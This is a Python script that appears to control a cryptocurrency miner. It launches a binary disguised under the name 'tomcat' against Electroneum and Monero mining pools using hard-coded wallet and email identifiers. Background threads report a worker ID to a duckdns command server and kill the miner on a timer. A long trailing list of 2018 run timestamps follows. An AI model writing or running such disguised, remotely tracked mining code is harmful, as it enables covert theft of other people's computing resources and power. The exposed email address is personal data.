import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:21:06.246833
#2018-02-17 16:08:07.552095
#2018-02-17 17:57:05.218525
#2018-02-17 19:44:06.136194
#2018-02-17 21:33:05.430422
#2018-02-17 23:17:04.891012
#2018-02-18 01:04:07.452716
#2018-02-18 02:52:04.528029
#2018-02-18 04:41:06.663248
#2018-02-18 06:33:05.388039
#2018-02-18 08:21:02.127025
#2018-02-18 10:10:06.700645
#2018-02-18 11:56:05.115339
#2018-02-18 13:41:05.094300
#2018-02-18 15:32:04.204242
#2018-02-18 17:20:05.589077
#2018-02-18 19:09:04.414845
#2018-02-18 20:55:06.285946
#2018-02-18 22:41:01.550868
#2018-02-19 00:30:04.477896
#2018-02-19 02:15:09.200744
#2018-02-19 04:04:04.846166
#2018-02-19 05:48:06.714458
#2018-02-19 07:37:07.185037
#2018-02-19 09:26:07.602758
#2018-02-19 11:15:07.507621
#2018-02-19 13:02:08.367838
#2018-02-19 14:51:07.863153
#2018-02-19 16:39:01.887711
#2018-02-19 18:26:01.296249
#2018-02-19 20:10:11.326852
#2018-02-19 22:00:09.949381
#2018-02-19 23:47:04.195214
#2018-02-20 01:34:04.551192
#2018-02-20 03:21:07.914416
#2018-02-20 05:07:06.075526
#2018-02-20 06:50:07.521777
#2018-02-20 08:36:05.578992
#2018-02-20 10:20:06.882959
#2018-02-20 12:05:01.691113
#2018-02-20 13:51:10.511733
#2018-02-20 15:37:05.984683
#2018-02-20 17:22:05.258394
#2018-02-20 19:11:07.715106
#2018-02-20 21:01:06.746818
#2018-02-20 22:46:07.514695
#2018-02-21 00:29:03.800859
#2018-02-21 02:15:05.556489
#2018-02-21 04:03:02.141260
#2018-02-21 05:50:06.881665
#2018-02-21 07:38:04.089977
#2018-02-21 09:23:03.963303
#2018-02-21 11:12:01.459582
#2018-02-21 12:59:07.951639
#2018-02-21 14:47:01.714403
#2018-02-21 16:35:01.318352
#2018-02-21 18:25:01.315504
#2018-02-21 20:10:01.303484
#2018-02-21 21:57:05.619783
#2018-02-21 23:44:09.114421
#2018-02-22 01:36:06.220475
#2018-02-22 03:23:07.186603
#2018-02-22 05:11:06.186431
#2018-02-22 06:55:04.211119
#2018-02-22 08:42:06.678595
#2018-02-22 10:29:04.303764
#2018-02-22 12:14:04.061779
#2018-02-22 13:59:05.008675
#2018-02-22 15:46:07.676848
#2018-02-22 17:34:09.060690
#2018-02-22 19:21:09.484484
#2018-02-22 21:13:05.098286
#2018-02-22 22:57:05.263404
#2018-02-23 00:43:05.080514
#2018-02-23 02:31:06.897249
#2018-02-23 04:20:04.156217
#2018-02-23 06:05:02.094907
#2018-02-23 07:49:05.407802
#2018-02-23 09:53:03.877169
#2018-02-23 11:58:04.004127
#2018-02-23 13:47:04.419403
#2018-02-23 15:36:09.183475
#2018-02-23 17:24:04.265211
#2018-02-23 19:09:08.680121
#2018-02-23 20:53:08.162571
#2018-02-23 22:38:05.673939
#2018-02-24 00:24:05.770077
#2018-02-24 02:16:01.251277
#2018-02-24 04:05:01.313118
#2018-02-24 06:42:01.823701
#2018-02-24 08:31:05.187911
#2018-02-24 10:18:05.916996
#2018-02-24 12:14:01.924893
#2018-02-24 14:01:05.769853
#2018-02-24 15:52:05.551932
#2018-02-24 17:46:01.182512
#2018-02-24 19:33:05.222949
#2018-02-24 21:21:05.296573
#2018-02-25 00:01:03.359572
#2018-02-25 04:09:05.700276
#2018-02-25 07:40:08.994233